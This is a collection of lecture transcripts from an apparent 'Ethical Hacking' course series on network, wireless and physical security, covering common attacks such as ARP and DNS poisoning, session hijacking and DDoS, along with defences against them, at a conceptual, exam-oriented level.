Ethical Hacking

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 88 today we're going to discuss about Physical security.Physical security is really important to your organization's network security.After all, if an attacker is able to touch your network,your server, or your work stations,they can take control over those devices and do whatever they want with them.While we've been talking a lot in this course about all of the logical protections you can put in place,things like firewalls and intrusion detection systems,router ACLs, passwords, encryption,and all sorts of things like that,our physical security is just as important.Now, physical security is usually broken down into three main areas.We have the perimeter,we have the building,and then we have the room itself.So when I start talking about the perimeter,I'm talking about, as I approach your building, what is in my way?Are there fences?Are there guards?Is there some sort of vehicle access point?All of those type of things, that's our perimeter.What keeps us at bay and away from the building? Next, we get to the building security. Is the front door unlocked? Can I walk right in? Do I have to show my ID? Do I have to check in with somebody? What are the different controls you're putting in place to secure that building?And then finally we have the security of the room where your equipment is located.Now, if this is an office, this is going to be someplace that people actually work, and so people have to be able to get in there to access those terminals.How are you keeping unauthorized people out of those offices?And if you're dealing with a server room or a networking closet, those are places that people don't normally work inside of.And so when nobody's in there, we should be locking those using some sort of locking mechanism,whether that's a door lock, an electronic lock,or some other mechanism.Now, we'll talk about that all inside this section of the episode.

Hello everyone welcome to the show "Ethical Hacking" episode 87 today we are going to discuss about We just spent a lot of time talking about wireless networks, but there are other wireless networks out there besides Wi-Fi.These include things like Bluetooth,RFID, Near Field Communication, cellular,GPS, and satellite communications.Previously, we've talked about some vulnerabilities with Bluetooth.I want to remind you of two big terms when it comes to Bluetooth.This is bluejacking and bluesnarfing.I'm covering these again because I guarantee you're going to get at least one question on test day about either bluejacking or bluesnarfing really loves to ask that for some reason.Bluejacking is the sending of unsolicited messages to Bluetooth-enabled devices such as mobile phones and tablets.Bluesnarfing, on the other hand,is the unauthorized access of information from a wireless device through a Bluetooth connection.So, to simplify this for the I want you to remember this.Bluejacking sends information to a device where Bluesnarfing takes information from a device.If you remember those two things,you'll do great on the exam.Also, when it comes to Bluetooth,remember you don't want to allow your device to use the default PIN for its pairing operations You should always change the PIN to something more secure than 1234 or 0000.Next, we have Radio Frequency Identification or RFID.RFID devices have an embedded radio frequency signal that's used to transmit identifying information about the device or the token to a reader that's trying to pick it up.RFID refers to a large category of devices and technologies,but, for the exam, the specifics of RFID are not that important.Instead, you need to focus on the fact that RFID devices can send information from a card to a reader to provide authentication or identification.For example, one of the most common devices that we use RFID for is a card that looks like a credit card,and can be used as part of your alarm system or door access system.So, with these cards, you can swipe your card over the reader, and it identifies you and allows you to enter the building.Because there are so many different types of RFID devices, RFID can operatein either very close environments or very far environments.It can be as close as 10 centimeters from the reader or as high as 200 meters from the reader depending on the particular device and technology in use.Because of that large distance,RFID is subject to eavesdropping,the ability to capture, replay, and rebroadcast its radio frequency as part of a larger attack.To minimize the ability to eavesdrop on RFID, an idea called Near Field Communication was invented.Near Field Communication or NFC allows two devices to transmits information when they're in close proximity to each other.This occurs using an automated pairing process and transmission process of that data.For example, some cellphones have the ability where you can touch the cellphones together to pass photographs back and forth.Other uses of NFC are common place in payment systems.For example, I have an iPhone,and I can hold it over a credit card terminal to pay with my credit card that's linked through Apple Pay.This is an example of a Near Field Communication device.Just like RFID, we do have to worry about the possibility of interception of that wireless information though because it could be replayed and rebroadcast Now, luckily for us, NFC does require the devices to be very close for the communication to work.

Hello everyone welcome to the show "Ethical Hacking" episode 86 today we are going to discuss about So we've talked about securing our wireless networks.Let's now spend a few minutes talking about the different types of attacks that focus on our wireless networks.The first is war driving.War driving is the act of searching for wireless networks by driving around until you find them.You could try this tonight. You can go sit in the backseat of your car,have your friend or your wife,drive you around the neighborhood and see which networks you can connect to.That's the idea here.They're simply going to drive around and hunt for networks.Now the attackers here are going to use different tools to do this.They can use wireless survey tools or other open source attack tools, but the common theme here is just finding out what networks are around and where you can access them from.Why would an attacker want to find open wireless networks or networks that they can get on to?It's not necessarily to attack your network,but it's to attack other networks through your network.So that way if they are doing some hacking or something like that,it traces back to your home and your home network,as opposed to tracing it back to them.The next type of attack is called war chalking.War chalking is the act of physically drawing symbols in public places to denote the open, closed, or protected networks that are in range.It gets its name because in the early days,people would actually take chalk and draw on a telephone pole different symbols to tell other people what it is.Now an example of this might be as you're doing a war driving,you might find an open network.If you did, you could find a telephone pole nearby,you can mark it down with a symbol like this.We have two open half circles faced back to back with the SSID of it written above them and the number below to signify the bandwidth of the network.Afterall, attackers can be nice people too.And they like to share their findings with others and they wouldn't want somebody else wasting their time looking for a network,only to find it has low bandwidth.So by marking that down,you can help other people avoid that network.Now in addition to open networks, you may find closed networks If you find a closed network,it's going to be a closed circle with an SSID written above it and bandwidth written below it.This tells us that network has some kind of encryption,it's closed,but we haven't quite figured out the password yet.Now if we do figure out the password,we can actually use this other symbol.We have the closed circle,we have the SSID on the top left left,we have the password on the top right,and the bandwidth below it.Inside the circle we might write something like W or WEP or WPA2,so people know what type of encryption they need to connect to that network.Now as I said war chalking is not nearly as popular as it used to be.In fact we don't really see a lot of these symbols around in the city anymore.Instead, most of this is being done digitally. This is being done as part of websites or other apps that hackers use and share their finds,so people know what other kind of WiFi is out there.The next attack we have is known as an IV attack.An IV attack occurs when an attack observes the operation of a cipher being used with several different keys and they findthis mathematical relationship between those keys to determine the clear text data.Now I know that sounds really complicated,but the good news is you don't have to do the math to do it.There's programs that do it for you.This happened with WEP because of that 24 bit initialization vector.It makes it very easy to crack WEP because there's programs that do it for us.

Hello everyone welcome to the show "Ethical Hacking" episode 85 today we are going to discuss about Wireless access points.In addition to selecting the right encryption,it's also important to select the right placement and configuration of your wireless access points,in order for you to achieve a good security posture.Most small office, home office wireless system rely on a single point to multi-point setup.This relies on having a single access point that services all of the wireless clients.For example, on this floor plan,you can see the strongest signal is the red spot,that's centered around a single wireless access point,and all of the other office cubicles are connecting back into it.In this next example,you can see a multi-point to multi-point system.This has multiple access points that are going to be used to provide the wireless network services in an ESS,or extended service set configuration.They're all going to work together to provide one common network that's supported by these multiple access points.Now, in both of the previous examples,the wireless access points are using an omnidirectional antenna.This means that the access point is going to radiate out its signal equally in every single direction.Now, this can be good from a coverage perspective,but it also is dangerous.You may want to control which direction the signal is actually radiated, and if you do,you can do that using a bidirectional or a unidirectional antenna.For example, in a unidirectional antenna,all of the transmission power is going to be focused at a single direction.This allows you to choose which areas receive the signals,and which ones don't.So in this example,we're using a left-side focused antenna and it only transmits out to computers on that side of the building,while the computers on the right are going to remain in an uncovered area and not get any signal.Now, we've talked about this back in our network plus curriculum as well,but from an operational standpoint,we're trying to increase the coverage to all areas,when we're talking network plus.Now, from a security perspective, though,we may actually want to limit the area of coverage.Let's look at our heat map once more.Here you can see an extended service set configuration with two access points.Each of those access points has omnidirectional antennas.This is giving us good,adequate coverage around the office base,as you can see inside the floor plan.So our network technician for network plus did a good job here.Now, for this office,each cubicle also has a wired physical connection,but the access point there is just to provide the employees access while they're sitting at those conference tables in the middle,or if they're walking around using their cellphones.Now, all of this is great,and there's good coverage,meaning that it's meeting our operational needs.But, you'll also notice that orange and yellow area,which represents the medium and lower signal areas that are radiating outside the walls of the building.

Hello everyone welcome to the show "Ethical Hacking" episode 84 today we are going to discuss about Wireless encryption. Another huge vulnerability in wireless networks is the encryption that you choose to use.In this lesson, we're going to do a quick review of wireless encryption types,that you learned back in your Network Plus studies.The reason for this is because encryption of your data being transmitted is going to be paramount to increasing the security of your wireless networks.Now, most wireless encryption schemes rely on a pre-shared key.This is when the access point and the client use the same encryption key to encrypt and decrypt the data.The problem with this is scalability becomes difficult.Think about it, when a friend comes over to your house,to use your WiFi.You have to tell him your password.Now, if you have 50 friends come over,you're going to tell 50 different people your password,and now, all 50 of them know your password.And so, this is one of the first problems that we have with wireless encryption,is that if you're going to use a pre-shared key,you've got to figure out a secure way to distribute that key to everybody,and keep it secret.If all 50 people know your password,then it's probably not that secret anymore.Now, there are three main types of encryption that are in use from wireless networks.We have WEP, WPA, and WPA2.WEP is our first one.WEP is the Wired Equivalent Privacy.This came from the original 802.11 wireless security standard,and it claimed to be as secure as a wired network.I'm going to prove this wrong to you in our demonstration later,because we're going to brute-force WEP,and break it in about three minutes.WEP was originally used with a static 40-bit pre-shared encryption key,but later it was upgraded to a 64-bit key,and, then again, to a 128-bit key.This isn't the main problem with WEP, though.The main problem is a 24-bit Initialization Vector,or IV, that it uses in establishing the connection,and it's sent in clear text.As I said, WEP is not very secure,and because of this weak Initialization Vector,we're going to be able to brute-force WEP in just a couple of minutes,using using Aircrack-Ng and other tools.So, to replace WEP, they came up with WPA.WPA is the WiFi Protected Access standard.It uses a Temporal Key Integrity Protocol, or TKIP,which uses a 48-bit Initialization Vector,instead of the 24-bit Initialization Vector used by WEP.The encryption that it uses is the Rivest Cipher 4,or RC4, and it added Message Integrity Checking, or MIC.And, it uses all of this to make sure that the data is secure,and ensuring that it's not modified in transit.Overall, it's a pretty good standard,but it does have some flaws,and so version 2 was released to fix those.WPA version 2, or WiFi Protected Access version 2 was created as part of the 802.11i standard,to provide stronger encryption and better integrity checking.The integrity checking is conducted through CCMP,which is the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol.And, the encryption uses AES,the Advanced Encryption Standard.AES supports a 128-bit key, or higher,and WPA2 uses either a personal mode,with pretty short keys,or an enterprise mode,with centralized authentication via a radio server,or another centralized server,to handle that password distribution we were talking about.Now, I want to pause here for a second,and before we go any further,give you a couple of quick exam tips.First, if you're asked about WiFi,and it uses the word, Open, in the question, it's usually looking for some kind of answer that says the network has no security, or no protection.

Hello everyone welcome to the show "Ethical Hacking" episode 83 today we are going to discuss about Securing WiFi devices.Wireless devices are much less secure than our traditional networks because their data streams are simply flying through the air,waiting to be gobbled up by some attacker sitting out there.When we talked about wire tapping in the last lesson,we talked about having to gain access to the network physically.Well, with a wireless network that challenge is eliminated because the network is literally floating in the airways.In this lesson we're going to discuss some of the basic vulnerabilities associated with wireless networks and how you can combat them.First, the administrative access on the wireless access point is a vulnerability.Usually these have default user names and passwords like admin, admin like we discussed before.And you have to make sure you secure them.Also, remote administration should be disabled on your wireless access points.Remote administration is something that allows you to connect over the internet and then make changes to your wireless access point.You don't need that.Instead you should turn it off and make sure that you're doing it locally inside your network only to minimize that risk.The second vulnerability we have to think about is the service set identifier,or the SSID.Back in network plus you learned that the SSID is what uniquely identifies the network and it acts as the name of the wireless access point that the clients are going to use to connect to it.For example, if you came by my offices,you would see that my network is the oh so hard name to guess of vijay.Anyone who sees that might think hey that might be vijay kumar's WiFi, right?Well, that's the SSIDs job.It sits there and it broadcasts out hey I'm here,I'm here, I'm vijay, I'm vijay I'm vijay Now, according to you should disable the broadcast.So clients have to already know the name of it prior to connecting to it.They say this is a way to slow down the bad guy from attacking your network.As an ethical hacker myself,I can tell you that it isn't really going to slow me down.If you aren't broadcasting openly,your clients are still sending the same wireless access point information and that SSID with every single communication they make.It takes me about five seconds to find out your SSID if you're not broadcasting.So by disabling it you're just making operations harder for yourself and you're not really gaining any security here.Now all of that said,if you're asked disable SSID broadcast is considered good security in the security and you should implement it.In the real world, it really doesn't matter that much.Now the next one we're going to talk about is rogue access points.Rogue access points are another vulnerability out there.A rogue access point is an unauthorized wireless access point or wireless router that somebody connected to your network and it's going to give access to your secure network.For example, if you walk around your office and somebody decided that they didn't want to plug into that RJ45 jack all the way in the back wall over there,so they put a wireless access point so they can access it throughout the whole room.That makes operations easy for them,but that wireless access point wasn't properly configured.This is going to extend your wired network into the wireless realm,and it can introduce it's own DHCP server and cause all sorts of other issues.To prevent this you should enable MAC filtering on the network,network access control and run a good IDS or IPS on your network that can detect or prevent these devices when they initially try to connect.

Hello everyone welcome to the show "Ethical Hacking" episode 82 today we are going to discuss about Securing network media.Network media is the cabling that makes up our network.This can be copper,fiber optic, or coaxial.And they're going to be used as a connectivity method inside of our wired networks.Now, in addition to all the cables there's other parts of the cabling plant we have to think about.All those intermediate devices like patch panels, punch-down blocks,and network jacks all make up this cabling plant that runs throughout our organization.And each part of that can be a vulnerability for us.The first vulnerability I want to discuss is EMI.This stands for electromagnetic interference.Electromagnetic interference is a disturbance that can affect electrical circuits,devices, and cables due to radiation or electromagnetic conduction that occurs.Now, EMI is something that happens normally inside our businesses and inside our homes.EMI is caused by all sorts of things, like televisions,microwaves, cordless phones, baby monitors,motors like inside your vacuum, and other devices.Anything that is really a powered device,even handheld drills can cause electromagnetic interference.Now, to minimize EMI you need to install shielding around the source, for instance,your air conditioner lets off a lot of EMI.You could put shielding around that.Or you can shield the cable itself by choosing shielded twisted-pair.Now, STP cables, or shielded twisted-pair,have foil around either each twisted-pair in the cable or around the entire bundle of twisted-pairs to prevent emanations out of the cable or interference entering into the cable.STP gives you double benefit, it keeps things out, and it keeps things in.This is good for security and helps minimize this vulnerability.Now, the next vulnerability we have is called radio frequency interference, or RFI.RFI is just another type of interference like EMI.Like EMI it's a disturbance that can affect your electrical circuits,your devices, and your cables.But instead of being caused by electrical waves it's caused by radio waves.Most often from AM and FM transmission towers or cellular phone towers.Now, cell towers and radio towers near your office can be a big source of RFI in your wireless networks.And when you have a significant amount of RFI this can cause to network connectivity problems for your wired networks, as well as disturbing your wireless networks too.Now, this is something that you're going to have to address.And a lot of it is going to be addressed by shielding the building or getting stronger devices that can overcome the radio frequency interference that's occurring.Another vulnerability we have is what's known as crosstalk.Crosstalk occurs when a signal is transmitted on one copper wire, and it creates an undesired effect on another copper wire.So, when we think about having two copper wires,like inside of a twisted-pair cable,if the shielding inside that protects those wires comes off,then we can actually have crossover from one wire to another.And that causes interference because of the data emanations and EMI.Crosstalk is essentially that,but in very close proximity.Now, this becomes very common with older cable network types, things like Cat3 networks,or even some early Cat5 networks.Most of our Cat5E and Cat6A networks aren't really subject to crosstalk nearly as much.Another place is see crosstalk happen a lot is if you have punch-down blocks,and you decide to use an older terminal,like the old 66 blocks that were used for phone lines,and tried to use that for networks.Networks should always use a 110 block,like you learned back in Network because it gives more spacing and prevents crosstalk from occurring.The next thing you want to talk about here is STP cables because STP cables are really helpful to our networks.They can prevent some of that RFI, they can prevent EMI.And they can help with crosstalk.

Hello everyone welcome to the show "Ethical Hacking" episode 81 today we are going to discuss about Securing network devices.Network devices include things like switches, routers,firewalls, IDS, IPS, and more.Each of these different devices has its own vulnerabilities that have to be addressed.But for the security.we're going to focus on the most common vulnerabilities across all of these different devices.The first vulnerability we're going to talk about is default accounts.These are accounts that exist on a device straight out of the box when you buy it.So for example, if you buy a small office,home office wireless access point.Like a Linksys or a D-Link, or something like that,it's going to have some accounts already established on there.It might have one like admin or administrator or user,or something of that nature.All of these default accounts are very easy to figure out and very easy to guess.And so it's important for you to actually change these names so that they're not something that an attacker can easily guess.And then all they have to do is guess your password.Now, this applies to your organizations as well.You want to make sure that your naming schemes aren't really easy to guess.Unfortunately, though, most organizations are going to use a common naming scheme for all of their users.For example, most organizations like to use first name dot last name.So if your name was vijay kumar like me,you're vijaykumar@yourcompany.com.Or sometimes they'll do something like vkumar@yourcompany.com, where it's the first letter and the last name.Any of these make for a great,normal, easy to understand naming scheme.That makes operations very easy.But it also makes it fairly easy to guess.Because if I see that Jason.Dion@whatever.com is one email,then I can probably guess that Susan.Smith is also there.Or whoever else I'm dealing with.You want to make sure you're thinking about this and you're starting to add diversity,and making sure that those default user names are changed.Now, the next thing you want to think about is the device user name as well.There's defaults for this too.I've seen people call them router or switch as the user names.That's not a good plan either.When you're creating a device account,you want it to be something more complex.So maybe it's rtr for router with a couple of numbers after it.Something that's not easily guessable.That's what I'm talking about here as we try to change these default accounts.The next issue we have goes right along with default accounts,it's weak passwords.Don't leave passwords as their default.For instance, those Linksys routers we all have,they're admin for user, admin for password.That is horrible.We also don't want to use any words that are in the dictionary.Your passwords need to be long, strong and complex with at least 14 characters long, upper case, lower case, special characters and numbers.By having this mixture, it's going to increase the time it takes to brute force that password,and make it much harder for an attacker to break in to your network.So for example, if I have the password of password,which is all lower case, I'm only using 26 different options because lower case letters are A through Z.And so if I look at that, that's considered a weak password.If I add some upper case to it, now I have 52 characters because I have upper case and lower case.So I have something like password,where the P, the S's and the D's are upper case and the other letters are lower case.If I want to make it even more secure,I can add numbers to that.And I'll change out the S's for fives and the Os for zeroes, things like that.And this is going to give us more choices, again,because we have 26 lower case, 26 upper case and 10 numbers, zero through nine.But if we want it to be the best and most secure that it possibly can be, we want to add symbols to this too.And so now we're going to get something like 70 different options.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 80 today we're going to discuss about In this section of the course,we're going to talk about securing your wired and wireless networks.We're going to start out with wired network devices,things like switches and routers,and then we'll move into the cabling that helps put all these networks together.After that, we're going to start talking about wireless networks and how we can better secure them and all the different types of attacks that exist for wireless networks.We'll even go through a demonstration in this section where I'm going to show you how easy it is to break wireless encryption and we'll be able to do that in about just two or three minutes.So it's really important to understand how to secure your networks properly so attackers can't do this to you.Now finally, we're going to round out this section by covering other types of wireless technology in addition to wifi,things like RFID,near-field communications,bluetooth, satellite communication,GPS, cellular, and others.So let's get started.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 79 today we're going to discuss about In the last lesson, we talked about the concept of DNS poisoning.In this lesson, I want to cover the concept of ARP poisoning with you fairly quickly.Now ARP stands for the address resolution protocol,like you learned back in Network Plus,and it's used to convert an IP address into a MAC address.If you remember back from Network Plus and our OSI model lesson,as data moves down the OSI stack, it uses IP addresses to transmit packets all over the world from router to router.But once it finds the right router,that router converts that IP address into a MAC address and passes it on to the switches inside of its own network,and that is going to help it to deliver the information using frames inside the data link layer.Now ARP poisoning is going to exploit the way that an ethernet network works.It's going to enable an attacker to steal,modify, or redirect frames of information on the network.The concept here is that the attacker's going to associate their MAC address with the IP address of another device within the network.This way, whenever the router asks for the MAC address that's associated with that IP,they get the attacker's MAC address instead of the legitimate user's.This allows the attacker to essentially take over any session that would involve MAC addresses at the layer two of the OSI model.Also, if the attacker wanted to get really creative here,they could set up a man in the middle using this technique by taking over the MAC address first,then passing the data back and forth between the victim and the rest of the network.To prevent ARP poisoning,you should set up good VLAN segmentation within your network,and also set up DHCP snooping to ensure that IP addresses aren't being stolen and taken over by an attacker.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 78 today we're going to discuss about DNS attacks.There are four different DNS attacks that you have to know for the security.There're DNS poisoning, unauthorized zone transfers,altered hosts files, and domain name kiting.Now, DNS poisoning occurs when the name resolution information is modified in the DNS server's cache.This modification of the data is done to redirect client computers to fraudulent or incorrect websites usually as part of follow-on attacks.The DNS system was designed without a lot of security embedded into it originally.This open architecture assumed a level of trust with all the other servers which I already told you is a pretty bad idea,but that has been taken advantage of by malicious attackers because trusting is a bad idea.Now, DNS poisoning usually occurs on a company's internal DNS servers instead of on public-facing DNS servers around the internet.With this type of attack, the internal client on the network has to make a request to go to a website like diontraining.com and whenever they make that request the client first checks with their local network's primary DNS server to see if it knows the IP address for that URL.If someone has gone there recently that IP address is already going to be stored in the local cache but if the cache was poisoned that user's now going to be redirected to a malicious website instead of the desired one.To counter act DNS poisoning, secure DNS also know as DNSSEC, has been created.DNSSEC uses encrypted digital signatures when passing DNS information between servers to help protect it from poisoning.You can also prevent your DNS servers from being poisoned by insuring that you're running the latest patches and the latest updates to make sure it's protected.Our next type of DNS attack is called an unauthorized zone transfer.DNS servers are normally configured to provide DNS data to a zone transfer which replicates information to other servers. With an unauthorized transfer though an attacker requests a copy of that zone transfer information and if they receive it they now have a list of all of your server names and IP addresses and this helps them plan for future attacks.Because of this, zone transfers should always be restricted between two known and trusted servers only and not let other people ask for zone transfers. The third type of DNS attack is focused on the client itself. Every computer and workstation has a file on it called the host file.The host file is a plain text file and it contains IP addresses and names.This is a reference that the operating system is going to check every time a DNS lookup is requested prior to going to a DNS server.So if the host file has a domain name being requested,it's simply going to provide the host file version of that DNS information instead of going out to a DNS server requesting it.So for example, one day my son was not doing his school work and it was really upsetting me.Instead I kept going up there and seeing he was watching YouTube.So, I logged into his computer and I added the URL for YouTube into his host list and I pointed that to the IP address for his school's website. Now, anytime my son typed in youtube.com instead of getting the DNS lookup for YouTube and getting redirected to their server he instead got the one from the host file that I maliciously put in there and it served up the home page for his school.Now, every time he tried to watch a video he was told hey you got to go to school, right? I think this is pretty funny and you may think it's funny too but he was not very happy about this change and he couldn't for the life of him figure out why YouTube wouldn't come up on his laptop.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 77 today we're going to discuss about Transitive attacks.Transitive attacks aren't really an actual type of attack but more of a conceptual method.It gets its name from the Transitive Property we learned back in mathematics.Essentially, the Transitive Property says that if A equals B and B equals C,then by all logic, A also equals C.Now, when it comes to Security ,and they talk about the idea of a transitive attack,they're really focusing on the idea of trust.If one network trusts a second network and that second network trusts a third network, then that first network really trusts the third network, and so, if an attacker can get into any one of those three networks,he can then get into the other two as well.This is based on that transitive trust.This is really important in the world of security because whoever you trust,you're also trusting everyone else that they've ever trusted. Whenever you connect your network to somebody else's network using a trust relationship, you're inherently assuming all of the risk of their security posture or the lack of their security posture in addition to your own security posture.Now, often in large enterprise networks, we reuse trust relationships between different domain controllers because this helps us minimize the amount of times that someone has to authenticate over and over for a resource,but, remember, whenever you sacrifice security in order to afford yourself better or quicker operations,there is a risk associated with it.So if your organization wishes to maintain a strong security posture,your systems should not assume trust but instead, should question and re-question every device and network that it wishes to connect to.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 76 today we're going to discuss about Replay attacks.A replay attack is a network-based attack where valid data transmissions are fraudulently or maliciously re-broadcast,repeated or delayed.This works a lot like a session hijack but it's a little bit different.With a session hijack,the attacker is trying to modify the information being sent and received at real time but with a replay attack,we're simply trying to intercept it,analyze it and decid whether or not to let it be passed on later again.Now, for example, if I were able to capture the session that occurs when you went in to log into your bank with your username and password,I could then replay that session to the bank later on in an attempt to log in as you.That's the idea of a replay attack.Now, to combat a replay attack,you should ensure that websites and devices are using session tokens to uniquely identify when an authentication session is occurring.Also, if you use multi-factor authentication,this can help prevent the ability of a log on session to be replayed because it doesn't have that token that has that random data that's changed every 30 to 60 seconds if you're using something like a one-time use password as part of your multi-factor authentication.One place where replay attacks have been used quite successfully though is in the world of wireless authentication.By capturing a device's handshake onto the wireless network,you can replay it later to gain access to that network yourself as if you were them.This is extremely common in the older protocols,especially the wired equivalent privacy or WEP when using a wireless network. So, you should be using the latest protocols like WPA2 to help prevent and minimize your risk.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 75 today we're going to discuss about Hijacking, next we have hijacking which is the exploitation of a computer session in an attempt to gain unauthorized access to data,services, or other resources on a computer or server.There are eight types of session hijacking that can be performed.Session theft, TCP/IP hijacking, blind hijacking,clickjacking, Man-in-the-Middle,Man-in-the-Browser, the watering hole attack and cross-site-scripting attacks.The first type of hijacking is known as session theft.With session theft the attacker is going to guess the session ID for a web session and that enables them to takeover the already authorized and established session of that client.Each session is uniquely identified with a random string but if the attacker can determine or guess that string they can take over the authenticated session with the server.And this example, you can see this is occurring at the session layer of the OSI model but it can also occur at the network or transport layer too.Now when it does it's called TCP/IP hijacking.Because it occurs when an attacker takes over a TCP session between two computers without the need of a cookie or other host access.Because TCP sessions only authenticate during the initial three-way handshake the attacker can jump into the session at any time they want if they can guess the next number in the packet sequence.This can also be used to create a denial of service attack against the initial host that way they can take it over and not let that person jump back into the session.Now, the next type of hijacking is called blind hijacking because it occurs when the attacker blindly injects data into a communication stream and won't be able to see the results whether they're successful or not.Clickjacking is our next type.This attack uses multiple transparent layers to trick a user into clicking on a button or link on a page when they were intending to click on something else.Basically the hyperlink to the malicious content is hidden under some legitimate clickable content.So you think you're clicking on an image and you're actually clicking on some link that takes you elsewhere.Now a Man-in-the-Middle attack is probably the attack you've heard most before.This is also one that is commonly used in session hijacking.A Man-in-the-Middle attack causes data to flow through the attacker's computer where it can then be intercepted or manipulated as it passes through.This is considered an active type of interception.So let's pretend that you've got some kind of malware on your computer and now all of your traffic is going to route through this attacker's machine. Well, if you wanted to transfer $50 from your bank account to your friend's but the attacker changes the amount and the destination of the account you may now be sending $5000 to the attacker instead of the $50 to your friend.This is the idea of a Man-in-the-Middle.Since the attacker is sitting right in the middle of that connection they can see and manipulate any data as it's being sent back and forth.Now a Man-in-the-Browser is very similar to the Man-in-the-Middle except it's limited to your browser's web communication instead of looking at the entire communication.This can occur because you have a Trojan that's infected your vulnerable web browser and it modifies web pages or transactions that are being done within that browser.To prevent this you should insure you have a good anti-malware solution installed and you have the latest security updates for your web browser because this will pretty much eliminate the Man-in-the-Browser attack.Next you have a watering hole.And a watering hole is something that we described all the way back in the beginning of this course.It occurs when malware is laced on a website that the attacker knows his potential victims are going to access.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 74 today we're going to discuss about Spoofing, spoofing is a category of network attacks that occur when an attacker masquerades as another person by falsifying their identity.Just like a person uses a mask to cover up their face to hide their true identity,spoofing is the electronic equivalent.We have briefly discussed spoofing a few times already,such as in the case of the DNS amplification attack when attempting a distributed denial of service by spoofing the IP address of the victim's server when making that request.Or we've talked about it before when we talked about fishing,where an attacker is trying to get you to click on a link in an email by falsifying their identity to trick you into clicking that link thinking that it's trusted.Anything that identifies a user or system can be spoofed, though.For example, each network interface card has a unique MAC address that's assigned to it,but MAC spoofing allows the attacker to change their MAC address to pretend that they're using a different device.IP addresses are also commonly used to identify a system, but with IP spoofing, the attacker can use somebody else's IP address as part of their attacks.So, how do we prevent spoofing from being effectively used against our systems?Well, the best way is to proper authentication,preferably multi-factor.Now when you use proper authentication,you're going to be able to identify a system or user more accurately and prevent the spoofing.If you can do this,you're going to be able to detect and stop spoofing quite easily.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 73 today we're going to discuss about We talked about a denial of service attack involving the continual flooding of a victim system with a request for services that causes a system to crash and run out of memory.Now, this usually happens when you're talking about one system attacking one system.But that wasn't enough with modern computers,so we moved up to the distributed denial of service attack,where hundreds or thousands of people target a single server to take it down.Now, in March of 2018, the website GitHub was actually hit by the largest DDoS that we've clocked to date.This is where tens of thousands of unique endpoints conducted a coordinated attack to hit that server with a spike in traffic,and the spike in traffic went up to 1.35 terabits per second.This took the website offline for all of five minutes.So you can see how these DDoSes are really hard on a server and can take them down,but not for very long if you can stop 'em.So your real question probably is,how can you survive one of these attacks?And how can you prevent it from taking down your organization's servers? Well, we have a couple of techniques.The first one is called blackholing or sinkholing.This technique identifies attacking IP addresses and routes all of their trafficto a non-existent server through a null interface.This effectively will stop the attack.Unfortunately, the attackers can move to a new IP and restart the attack all over again,and so this is only a temporary solution.Intrusion prevention systems can also be used to identify and respond to denial of service attacks.This can work for small scale attacks against your network,but you're not going to have enough processing power to handle a large scale attack or a big DDoS.Now, one of the most effective methods to utilize is to have an elastic cloud infrastructure.If you've built your infrastructure so that it can scale up when demand increases,you can ride out a DDoS attack.Now, the problem with this strategy, though,is that most service providers are going to charge you based on the capacity and resources that you used, so when you scale up,you're going to get a much larger bill from that service provider than you normally were expecting.And you're not getting a return on this investment,because this traffic was all wasted.It wasn't generating any revenue for you.So there's actually some specialized cloud providers out there that have taken on this challenge.People like Cloudflare and Akamai are designed to help you ride out these DDoS attacks.They provide web application filtering and content distribution on behalf of your organization. These service providers are focused on ensuring that you have highly robust, highly available networks that can ensure that they can ride out these DDoS attacks and these high bandwidth attacks.This is going to also give you additional layer defenses throughout your OSI model, and it's going to help provide you additional protections.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 72 today we're going to discuss about In the last lesson we discussed the concept of a denial of service attack,and we went over all of the different types of them, but most modern systems can't be taken down by a single machine attempting a denial of service anymore,so attackers got smarter and they created a distributed denial of service, or DDoS.Now a distributed denial of service attack,instead of using a single attack targeting one server they use hundreds or even thousands of machines to launch an attack simultaneously against a single server,and force it offline to create that denial of service condition.Usually these machines that conduct the attack don't even realize that they're a part of it though.Generally these machines have become zombies or bots inside a large bot net and then when they receive that command to attack,they all simultaneously send all their payloadsagainst a single victim.Now, in addition to most basic forms of DDoS attacks,there is one specific type of DDoS attack called a DNS amplification attack that could be performed.This specialized DDoS allows an attacker to generate a high volume of packets that's intended to flood a victim's website by initiating DNS requests from a spoof version of the target's IP address.This causes the DNS servers to respond to that request and send the response back to the server thinking that it's valid, because a DNS request uses very little bandwidth to send,but the response usually takes up a lot more bandwidth,this allows the attack to be amplified against the victim's server.Also if this is happening because thousands of simultaneous requests are being made by a bunch of zombies and a bot net on behalf of your victim's server,you can easily become overwhelmed with a lot of information and eat up lots of bandwidth pretty quickly causing that denial of service condition to occur.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 71 today we're going to discuss about we're going to focus on the concept of a Denial of Service attack.Now, a Denial of Service attack isn't a specific attack in and of itself,but instead is this category or type of attack that's carried out in a number of different ways.Essentially, the term Denial of Service is used to describe any attack which attempts to make a computer or service resources unavailable,but it can also be extended to network devices,like switches and routers as well.There are five subcategories of Denial of Service attacks,Flooding Attacks, the Ping of Death, the Teardrop,the Permanent Denial of Service attack, and the Fork Bomb.The first category is called a Flood Attack.This is a specialized type of Denial of Service which attempts to send more packets to a single server or host than it can handle.So, in this example,we see an attacker sending 12 requests at a time to a server.Now, normally a server wouldn't be overloaded with just 12 requests,but if I could send 12 hundred or 12,000 that might allow me to flood that server and take it down.Now, under a Flood Attack we have a few different specialized varieties that you're going to come across The first is called a Ping Flood,this attack is going to happen when somebody attempts to flood your server by sending too many pings.Now a ping is technically an ICMP echo request packet,but they like to call it a ping Because a Ping Flood has become so commonplace though,many organizations are now simply blocking echo replies,and simply having the firewall dropping these requests whenever they're received.This results in the attacker simply getting a request timed out message,and the service remains online,and the Denial of Service is stopped.Next we have a Smurf Attack.This is like a Ping Flood,but instead of trying to flood a server by sending out pings directly to it,the attacker instead tries to amplify this attack by sending a ping to a subnet broadcast address instead,using the spoofed IP of the target server.This causes all of the devices on that subnet to reply back to the victimized server with those 